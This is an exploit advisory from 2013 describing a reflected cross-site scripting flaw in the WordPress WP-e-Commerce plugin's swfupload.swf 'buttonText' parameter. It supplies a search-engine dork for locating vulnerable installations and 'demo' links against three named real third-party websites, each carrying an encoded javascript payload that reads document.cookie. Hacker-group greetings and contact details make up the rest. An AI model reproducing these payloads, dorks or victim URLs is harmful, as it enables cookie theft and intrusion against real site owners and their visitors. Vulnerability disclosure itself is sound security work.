# Title : Wordpress WP-e-Commerce plugin v3.8.9.5 Cross Site Scripting Vulnerability
# Date: 2013-03-15
# Software Link: http://wordpress.org/extend/plugins/wp-e-commerce/
# Credit: This Bug was founded by Asesino04 "The Black Devils"
# Tested on: Windows XP SP2
# Category: [webapps]
# Dork : inurl:plugins/wp-e-commerce/
# Special Thanks To : sH3LL05Dz & Lady NEXA & x3o-1337
# Please Like The New Fb page : https://fb.com/Th3.Black.D3Vils
-----------
http://127.0.0.1/path/wp-content/plugins/wp-e-commerce/wpsc-core/js/swfupload.swf?buttonText=[ XSS ]
# Demo :
http://www.aerologis.fr/wp-content/plugins/wp-e-commerce/wpsc-core/js/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EClick%20me%3C/a%3E
http://www.hanniballokumbe.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EClick%20me%3C/a%3E
http://www.referencement-top10.fr/wp-content/plugins/wp-e-commerce/wpsc-core/js/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EClick%20me%3C/a%3E
-----------
Thanks To : | r0073r | KedAns-Dz | D4RKCR1PT3R | Keystr0ke | x3o-1337 | Èlite TrØjan | sH3LL05Dz
| Ana Eve | DZ Combattant | Muhammad Talha Khan | r4dc0re | SeeMe CrosS | Zikou-16 | DaOne
| Angel Injection | NuxbieCyber | Tibit | Sammy FORGIT | D4NB4R beBoss | LORDOFDARKNES
| All Dz hackerz
-----------
Contact:
# Fane Page : www.facebook.com/Th3.Black.D3Vils
# Youtube : www.youtube.com/user/Th3BlackDevils
# Facebook : www.facebook.com/DevilsDz
# Email : mr.k4rizma@gmail.com
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information